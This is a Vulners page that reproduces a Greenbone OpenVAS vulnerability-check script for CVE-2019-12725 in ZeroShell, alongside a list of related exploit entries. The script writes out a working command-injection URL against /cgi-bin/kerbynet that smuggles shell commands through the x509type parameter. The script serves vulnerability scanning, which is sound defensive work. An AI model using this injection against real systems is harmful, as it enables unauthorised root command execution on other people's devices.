ZeroShell < 3.9.3 RCE Vulnerability - Active Check
🗓️ 19 Oct 2020 00:00:00Reported by Copyright (C) 2020 Greenbone AGType
openvas🔗 plugins.openvas.org👁 17 Views
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| ZeroShell 3.9.0 - (cgi-bin/kerbynet) Remote Root Command Injection Exploit | 24 Nov 202000:00 | – | zdt | |
| ZeroShell 3.9.0 - Remote Command Execution Exploit | 13 May 202100:00 | – | zdt | |
| Exploit for OS Command Injection in Zeroshell | 13 Jun 202123:57 | – | githubexploit | |
| Exploit for OS Command Injection in Zeroshell | 22 May 202105:06 | – | githubexploit | |
| Exploit for OS Command Injection in Zeroshell | 27 Apr 202103:36 | – | githubexploit | |
| CVE-2019-12725 | 19 Jul 201900:00 | – | attackerkb | |
| CVE-2019-12725 | 19 Jul 202019:18 | – | circl | |
| Zeroshell Remote Command Execution Vulnerability | 23 Jul 201900:00 | – | cnvd | |
| Zeroshell Remote Code Execution (CVE-2019-12725) | 9 Sep 202000:00 | – | checkpoint_advisories | |
| CVE-2019-12725 | 19 Jul 201922:17 | – | cve |
10
| Source | Link |
|---|---|
| zeroshell | www.zeroshell.org/new-release-and-critical-vulnerability/ |
| tarlogic | www.tarlogic.com/advisories/zeroshell-rce-root.txt |
# SPDX-FileCopyrightText: 2020 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.108947");
script_version("2026-03-17T05:57:28+0000");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"2026-03-17 05:57:28 +0000 (Tue, 17 Mar 2026)");
script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2021-05-13 18:15:00 +0000 (Thu, 13 May 2021)");
script_tag(name:"creation_date", value:"2020-10-19 11:34:11 +0000 (Mon, 19 Oct 2020)");
script_cve_id("CVE-2019-12725");
script_name("ZeroShell < 3.9.3 RCE Vulnerability - Active Check");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2020 Greenbone AG");
script_dependencies("find_service.nasl", "httpver.nasl", "os_detection.nasl",
"global_settings.nasl");
script_require_ports("Services/www", 443);
script_mandatory_keys("Host/runs_unixoide");
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"https://zeroshell.org/new-release-and-critical-vulnerability/");
script_xref(name:"URL", value:"https://www.tarlogic.com/advisories/zeroshell-rce-root.txt");
script_tag(name:"summary", value:"ZeroShell is prone to a remote code execution (RCE) vulnerability
because it fails to sufficiently sanitize user-supplied input.");
script_tag(name:"impact", value:"An attacker can exploit this vulnerability to view files or execute
arbitrary script code in the context of the web server process. This may aid in further attacks.");
script_tag(name:"vuldetect", value:"Send a GET request, try to include a local file and check the response.");
script_tag(name:"insight", value:"Input to the 'type' value in /cgi-bin/kerbynet is not properly sanitized.");
script_tag(name:"solution", value:"Update to version 3.9.3 or later.");
script_tag(name:"affected", value:"ZeroShell versions prior to 3.9.3.");
script_tag(name:"qod_type", value:"remote_app");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("host_details.inc");
include("os_func.inc");
include("misc_func.inc");
include("list_array_func.inc");
port = http_get_port(default:443);
buf = http_get_cache(item:"/", port:port);
if(!buf || ("<title>ZeroShell" >!< buf && "/cgi-bin/kerbynet" >!< buf))
exit(0);
cmds = exploit_commands("linux");
foreach pattern(keys(cmds)) {
cmd = cmds[pattern];
url = "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A" + cmd + "%0A'";
req = http_get(item:url, port:port);
buf = http_keepalive_send_recv(port:port, data:req);
if(match = egrep(string:buf, pattern:pattern)) {
info['1. URL'] = http_report_vuln_url(port:port, url:url, url_only:TRUE);
info['2. Used command'] = cmd;
info['3. Expected result'] = pattern;
report = 'By doing the following request:\n\n';
report += text_format_table(array:info) + '\n\n';
report += 'it was possible to execute a command on the target.';
report += '\n\nResult: ' + chomp(match);
security_message(port:port, data:report);
exit(0);
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Mar 2026 00:00Current
8High risk
Vulners AI Score8
CVSS 39.8
CVSS 210
EPSS0.89849